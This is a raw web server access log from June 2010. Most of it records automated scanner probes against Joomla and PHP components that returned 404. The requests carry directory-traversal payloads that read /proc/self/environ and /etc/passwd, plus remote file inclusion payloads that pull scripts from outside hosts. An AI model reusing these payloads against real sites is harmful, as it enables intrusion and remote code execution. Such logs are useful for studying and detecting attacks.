194.79.28.66 - - [13/Jun/2010:07:03:20 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:03:35 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
62.44.82.118 - - [13/Jun/2010:07:03:37 -0500] "GET /logs/access_log.1274227200//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:07:03:38 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:07:03:38 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:07:04:13 -0500] "GET /logs/access_log.1274832000//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:07:04:13 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:07:04:14 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.813"
194.79.28.66 - - [13/Jun/2010:07:04:19 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:04:20 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:04:20 -0500] "GET /logs//index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.808"
178.63.27.83 - - [13/Jun/2010:07:04:49 -0500] "GET /logs/access_log.1274832000//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:07:04:50 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:07:04:50 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:07:04:52 -0500] "GET /logs/access_log.1274572800//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:07:04:53 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:07:04:53 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.813"
59.42.10.71 - - [13/Jun/2010:07:05:15 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
59.42.10.71 - - [13/Jun/2010:07:05:18 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
59.42.10.71 - - [13/Jun/2010:07:05:20 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
178.63.27.83 - - [13/Jun/2010:07:05:37 -0500] "GET /logs/access_log.1274313600//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.813"
194.79.28.66 - - [13/Jun/2010:07:05:38 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:05:38 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:05:38 -0500] "GET /logs//index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:06:11 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:06:12 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:06:12 -0500] "GET /logs//index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.808"
69.64.91.113 - - [13/Jun/2010:07:06:20 -0500] "GET /logs/access_log.1274832000//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:07:06:20 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:07:06:20 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.828"
62.44.82.118 - - [13/Jun/2010:07:06:32 -0500] "GET /logs/access_log.1274313600//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:07:06:32 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:07:06:32 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:07:06:46 -0500] "GET /logs/access_log.1274313600//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.813"
194.79.28.66 - - [13/Jun/2010:07:06:54 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:06:55 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:06:55 -0500] "GET /logs//index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.808"
67.195.112.180 - - [13/Jun/2010:07:08:53 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1799 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.71.188.11 - - [13/Jun/2010:07:09:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.64.91.113 - - [13/Jun/2010:07:10:29 -0500] "GET /logs/access_log.1274572800//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:07:10:29 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:07:10:29 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:07:10:33 -0500] "GET /logs/access_log.1274313600//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:07:10:33 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:07:10:33 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.828"
62.210.190.230 - - [13/Jun/2010:07:11:13 -0500] "GET /Gallery/displayCategory.php?basepath=http://hytg.interfree.it/id.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
62.210.190.230 - - [13/Jun/2010:07:11:15 -0500] "GET //Gallery/displayCategory.php?basepath=http://hytg.interfree.it/id.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
174.133.206.82 - - [13/Jun/2010:07:12:03 -0500] "GET /logs/access_log.1271721600//admin/auth.php?xcart_dir=http://www.oakbayunitedchurch.ca/site/components/idrose.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
69.64.91.113 - - [13/Jun/2010:07:12:08 -0500] "GET /logs/access_log.1274572800//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.828"
74.124.198.60 - - [13/Jun/2010:07:13:25 -0500] "GET /logs/access_log.1274572800/old_reports.php?file=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:13:25 -0500] "GET /logs/old_reports.php?file=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:13:25 -0500] "GET /old_reports.php?file=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:13:31 -0500] "GET /old_reports.php?file=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:13:31 -0500] "GET /logs/old_reports.php?file=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:13:31 -0500] "GET /logs/access_log.1274572800/old_reports.php?file=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.64.91.113 - - [13/Jun/2010:07:13:56 -0500] "GET /logs/access_log.1274832000//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.828"
174.133.206.82 - - [13/Jun/2010:07:14:06 -0500] "GET /logs/access_log.1271548800//admin/auth.php?xcart_dir=http://www.oakbayunitedchurch.ca/site/components/idrose.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
174.133.206.82 - - [13/Jun/2010:07:14:06 -0500] "GET //admin/auth.php?xcart_dir=http://www.oakbayunitedchurch.ca/site/components/idrose.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
174.133.206.82 - - [13/Jun/2010:07:14:06 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.oakbayunitedchurch.ca/site/components/idrose.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
59.42.10.71 - - [13/Jun/2010:07:14:49 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
174.133.206.82 - - [13/Jun/2010:07:15:53 -0500] "GET /logs/access_log.1271721600//admin/auth.php?xcart_dir=http://www.oakbayunitedchurch.ca/site/components/idrose.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
66.71.188.11 - - [13/Jun/2010:07:16:17 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:16:18 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:16:32 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:16:32 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:16:39 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:16:39 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:16:39 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:17:10 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:17:23 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:18:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:18:23 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:07:18:24 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
178.63.27.83 - - [13/Jun/2010:07:20:46 -0500] "GET /logs/access_log.1274832000//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:07:20:46 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:07:20:46 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.813"
208.115.111.248 - - [13/Jun/2010:07:21:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
94.23.197.156 - - [13/Jun/2010:07:22:37 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:07:22:37 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
59.42.10.71 - - [13/Jun/2010:07:23:17 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
59.42.10.71 - - [13/Jun/2010:07:23:19 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
59.42.10.71 - - [13/Jun/2010:07:23:22 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
94.23.197.156 - - [13/Jun/2010:07:23:22 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:07:23:22 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:23:34 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:23:34 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:23:44 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:23:44 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:23:55 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:23:56 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:23:58 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:23:58 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:23:59 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:23:59 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.75.219.113 - - [13/Jun/2010:07:24:07 -0500] "GET /index.php?p=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
62.75.219.113 - - [13/Jun/2010:07:24:07 -0500] "GET /index.php?p=./../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""-"
94.23.6.211 - - [13/Jun/2010:07:24:21 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:24:21 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:24:22 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:07:24:22 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
59.42.10.71 - - [13/Jun/2010:07:30:16 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
195.235.95.22 - - [13/Jun/2010:07:37:15 -0500] "GET //index.php?option=com_jeformcr&view=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""-"
195.235.95.22 - - [13/Jun/2010:07:37:15 -0500] "GET /logs//index.php?option=com_jeformcr&view=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""-"
195.235.95.22 - - [13/Jun/2010:07:37:16 -0500] "GET /logs//index.php?option=com_jeformcr&view=./../../../../../../../proc/self/environ HTTP/1.1" 404 299 "-""-"
195.235.95.22 - - [13/Jun/2010:07:37:16 -0500] "GET //index.php?option=com_jeformcr&view=./../../../../../../../proc/self/environ HTTP/1.1" 404 294 "-""-"
188.40.178.145 - - [13/Jun/2010:07:49:24 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
174.121.237.135 - - [13/Jun/2010:07:50:02 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
174.121.237.135 - - [13/Jun/2010:07:50:02 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
174.121.237.135 - - [13/Jun/2010:07:50:02 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
174.121.237.135 - - [13/Jun/2010:07:50:02 -0500] "GET /logs/access_log.1272585600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
188.40.178.145 - - [13/Jun/2010:07:50:13 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
219.240.36.36 - - [13/Jun/2010:07:50:31 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:07:50:31 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:07:50:33 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
74.124.198.60 - - [13/Jun/2010:07:50:37 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:50:37 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:50:37 -0500] "GET /logs/access_log.1272585600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:50:37 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:50:37 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:50:37 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:50:37 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:07:50:37 -0500] "GET /logs/access_log.1272585600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
62.210.190.230 - - [13/Jun/2010:07:52:49 -0500] "GET /logs//Gallery/displayCategory.php?basepath=http://hytg.interfree.it/id.jpg?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
208.115.111.248 - - [13/Jun/2010:07:59:48 -0500] "GET /logs/access_log.1219536000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:07:59:50 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:07:59:53 -0500] "GET /logs/access_log.1219708800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:07:59:54 -0500] "GET /logs/access_log.1219881600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
89.111.176.22 - - [13/Jun/2010:07:59:56 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=/../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""Microsoft Pocket Internet Explorer/0.6"
89.111.176.22 - - [13/Jun/2010:07:59:56 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=/../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""Microsoft Pocket Internet Explorer/0.6"
208.115.111.248 - - [13/Jun/2010:07:59:57 -0500] "GET /logs/access_log.1220140800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:07:59:59 -0500] "GET /logs/access_log.1220313600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:08:00:02 -0500] "GET /logs/access_log.1220400000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
